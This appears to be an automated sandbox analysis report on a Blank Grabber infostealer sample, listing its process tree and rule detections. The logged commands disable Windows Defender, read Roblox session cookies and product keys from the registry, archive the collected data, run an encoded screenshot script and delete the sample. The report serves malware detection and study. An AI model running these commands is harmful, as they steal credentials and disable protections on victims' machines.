      • cmd.exe (PID: 5804 cmdline: C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • attrib.exe (PID: 7500 cmdline: attrib -r C:\Windows\System32\drivers\etc\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • cmd.exe (PID: 7584 cmdline: C:\Windows\system32\cmd.exe /c "getmac" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • getmac.exe (PID: 7688 cmdline: getmac MD5: 7D4B72DFF5B8E98DD1351A401E402C33)
      • cmd.exe (PID: 7596 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 5772 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 6692 cmdline: C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • attrib.exe (PID: 7812 cmdline: attrib +r C:\Windows\System32\drivers\etc\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • cmd.exe (PID: 6420 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 7416 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 3228 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7412 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 8084 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 7344 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 7408 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 7228 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 7812 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8040 cmdline: powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 5840 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 3524 cmdline: powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7112 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe a -r -hp"mined" "C:\Users\user\AppData\Local\Temp\rEC04.zip" *" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • rar.exe (PID: 8048 cmdline: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe a -r -hp"mined" "C:\Users\user\AppData\Local\Temp\rEC04.zip" * MD5: 9C223575AE5B9544BC3D69AC6364F75E)
      • cmd.exe (PID: 7816 cmdline: C:\Windows\system32\cmd.exe /c "wmic os get Caption" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7784 cmdline: wmic os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 1776 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7368 cmdline: wmic computersystem get totalphysicalmemory MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 7924 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7064 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 7348 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 5912 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 6112 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7800 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 5340 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7276 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 2072 cmdline: C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\Resource.exe"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • PING.EXE (PID: 5552 cmdline: ping localhost -n 3 MD5: 2F46799D79D22AC72C241EC0322B011D)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\_MEI66322\rarreg.keyJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
    SourceRuleDescriptionAuthorStrings
    00000001.00000003.2030787005.0000020AB3901000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
      00000000.00000003.2019140558.00000203A2F47000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
        00000001.00000002.2473117545.0000020AB3C0B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
          00000001.00000003.2030704997.0000020AB38CE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
            00000001.00000002.2473004554.0000020AB39C0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
              Click to see the 7 entries

              System Summary

              barindex
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Resource.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Resource.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Resource.exe", ParentImage: C:\Users\user\Desktop\Resource.exe, ParentProcessId: 6048, ParentProcessName: Resource.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Resource.exe'", ProcessId: 2360, ProcessName: cmd.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Resource.exe", ParentImage: C:\Users\user\Desktop\Resource.exe, ParentProcessId: 6048, ParentProcessName: Resource.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 3936, ProcessName: cmd.exe
              Source: Process startedAuthor: @ROxPinTeddy: Data: Command: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe a -r -hp"mined" "C:\Users\user\AppData\Local\Temp\rEC04.zip" *", CommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe a -r -hp"mined" "C:\Users\user\AppData\Local\Temp\rEC04.zip" *", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Resource.exe", ParentImage: C:\Users\user\Desktop\Resource.exe, ParentProcessId: 6048, ParentProcessName: Resource.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe a -r -hp"mined" "C:\Users\user\AppData\Local\Temp\rEC04.zip" *", ProcessId: 7112, ProcessName: cmd.exe
              Source: Threat createdAuthor: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\System32\wbem\WMIC.exe, SourceProcessId: 7368, StartAddress: C76632B0, TargetImage: C:\Windows\System32\wbem\WMIC.exe, TargetProcessId: 7368
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Source: Process startedAuthor: Ilya Krestinichev: Data: Command: C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\Resource.exe"", CommandLine: C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\Resource.exe"", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Resource.exe", ParentImage: C:\Users\user\Desktop\Resource.exe, ParentProcessId: 6048, ParentProcessName: Resource.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\Resource.exe"", ProcessId: 2072, ProcessName: cmd.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\Resource.exe, ProcessId: 6048, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ? .scr
              Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBw